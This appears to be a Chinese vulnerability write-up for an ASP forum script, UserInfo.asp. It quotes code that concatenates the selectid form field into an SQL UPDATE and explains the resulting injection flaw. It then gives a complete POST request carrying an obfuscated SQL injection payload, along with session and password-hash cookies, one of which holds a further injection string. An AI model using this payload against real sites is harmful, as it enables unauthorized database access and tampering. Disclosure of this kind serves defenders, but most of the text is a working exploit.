在文件UserInfo.asp中：

case 6   //第1289行

            dim selectid

            selectid=trim(RequestCStringSafe(Request.Form("selectid")))

            if selectid="" then

                Response.Write "<br><br><center><li>所选内容不能为空！</li></center><br><br><br><br>"

            else

                if instr(1,selectid,", ")>0 then

                    selectid = Replace(selectid, ", "," or id=")

                end if

                selectid="id="&selectid

                conn.execute("update lxtel_topic set myfiles=0 where "&selectid&"")

程序对数字变量selectid过滤不当导致注入漏洞的产生。

POST /userinfo.asp?cz=8&mypost=6 HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/QVOD, */*

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)

Host: localhost

Content-Length: 80

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSADTQSBB=MJJBPFMBPGGMJLFJOIHAOOAB; BBSGood%2ESpeedadmin=0; BBSGood%2ESpeedpassword=98513a2197288d8a; BBSGood%2ESpeedusername=lovemmm; d3ef3_lastpos=index; d3ef3_ol_offset=97; 1059d_lastpos=other; 1059d_ol_offset=97; 1059d_winduser=BWpXVlRWCAcDBgQFAQIGDV0BUlsGUgUHAABVVVYABQdRDDA%3D; 1059d_ck_info=%2F%09; 1059d_lastvisit=7212%091225703227%09%2Fu.php%3Faction%3Dtopic%26username%3Dlovemmm%25efdd%2527%2520or%2520m.username%3D%27lovemmm; 1059d_threadlog=%2C4%2C; 1059d_ipfrom=f528764d624db129b32c21fbca0cb8d6%09%B1%BE%BB%FA%B5%D8%D6%B7%0D; 1059d_readlog=%2C1%2C

 

selectid=1%2F**%2Fand%2F**%2Fuser%2F**%2Fin%2F**%2F%280%29--&Submit=%CC%E1%BD%BB